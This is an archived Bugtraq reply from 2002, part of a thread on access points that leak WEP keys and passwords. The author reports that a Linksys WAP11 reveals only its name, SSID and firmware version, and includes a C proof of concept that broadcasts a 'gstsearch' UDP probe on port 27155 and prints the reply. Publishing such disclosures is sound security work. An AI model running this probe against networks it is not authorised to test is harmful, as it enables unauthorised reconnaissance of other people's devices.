Bugtraq mailing list archives

Re: Accesspoints disclose wep keys, password and mac filter (fwd)


From: Thomas Sarlandie <sarfata () altern org>
Date: Tue, 05 Nov 2002 15:24:07 +0100

Hi,

Linksys WAP11-V2.2 seems to be vulnerable in a different way: it only returns the AP's name, SSID and firmware version. Apart from the firmware version, this is not private information.

Quickly patched proof of concept :

#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Layout used to interpret the reply datagram.  Every member is a
 * fixed-width char array, so the struct is 117 bytes with no padding;
 * the packed attribute makes that explicit.  Nothing in the layout
 * guarantees that a field is NUL-terminated.
 */
typedef struct __attribute__ ((packed)) {
        char type[28];      /* printed as "Type" */
        char blank1[8];     /* not interpreted */
        char apname[32];    /* printed as "Announced Name" */
        char firmware[6];   /* printed as "Firmware version" */
        char blank2[11];    /* not interpreted */
        char ssid[32];      /* printed as "SSID" */
} answer;

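/*
 * Print one fixed-width field copied out of the reply.
 *
 * The reply comes from whichever host answers on the network, so it is
 * treated as untrusted: output stops at the first NUL or at `width`
 * bytes, whichever comes first, and any byte outside printable ASCII is
 * shown as '.' so a reply cannot inject terminal control sequences.
 */
static void print_field(const char *label, const char *field, size_t width)
{
        printf("%s: ", label);
        for (size_t i = 0; i < width && field[i] != '\0'; i++) {
                unsigned char c = (unsigned char)field[i];

                putchar((c >= 0x20 && c < 0x7f) ? c : '.');
        }
        putchar('\n');
}

/*
 * Send the "gstsearch" datagram to the broadcast address on UDP port
 * 27155, wait for one reply and print its type, name, firmware version
 * and SSID fields.
 *
 * Returns 0 once a reply has been printed; exits with status 1 if the
 * socket cannot be set up, the send fails, or no usable reply is read.
 */
int main(void)
{
        char rcvbuffer[1024];
        struct sockaddr_in sin;
        answer ans;
        ssize_t n;
        size_t got;
        int sd;
        int val = 1;

        /* Clear the whole address first so sin_zero is not stack garbage. */
        memset(&sin, 0, sizeof sin);
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = htonl(INADDR_BROADCAST);
        sin.sin_port = htons(27155);

        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0) {
                /* Without a descriptor every later call would fail too. */
                perror("socket");
                exit(1);
        }

        if (setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val)) < 0) {
                perror("setsockopt");
                close(sd);
                exit(1);
        }

        n = sendto(sd, "gstsearch", 9, 0,
                   (const struct sockaddr *)&sin, sizeof sin);
        if (n < 0) {
                perror("sendto");
                close(sd);
                exit(1);
        }

        n = read(sd, rcvbuffer, sizeof(rcvbuffer));
        if (n < 0) {
                perror("read");
                close(sd);
                exit(1);
        }
        if (n == 0) {
                /* errno is not set for an empty datagram; do not perror(). */
                fprintf(stderr, "read: empty reply\n");
                close(sd);
                exit(1);
        }

        /*
         * Copy only the bytes that actually arrived into a zeroed struct.
         * A short reply then yields empty fields rather than leftover
         * stack contents.
         */
        memset(&ans, 0, sizeof ans);
        got = (size_t)n < sizeof ans ? (size_t)n : sizeof ans;
        memcpy(&ans, rcvbuffer, got);
        if (got < sizeof ans) {
                fprintf(stderr,
                        "warning: short reply (%zu of %zu bytes); "
                        "missing fields are shown empty\n",
                        got, sizeof ans);
        }

        print_field("Type             ", ans.type, sizeof ans.type);
        print_field("Announced Name   ", ans.apname, sizeof ans.apname);
        print_field("Firmware version ", ans.firmware, sizeof ans.firmware);
        print_field("SSID             ", ans.ssid, sizeof ans.ssid);

        close(sd);
        return 0;
}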

thomas

KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------

Title
-----
       Accesspoints disclose wep keys, password and mac filter

Date
----
       2002-11-01




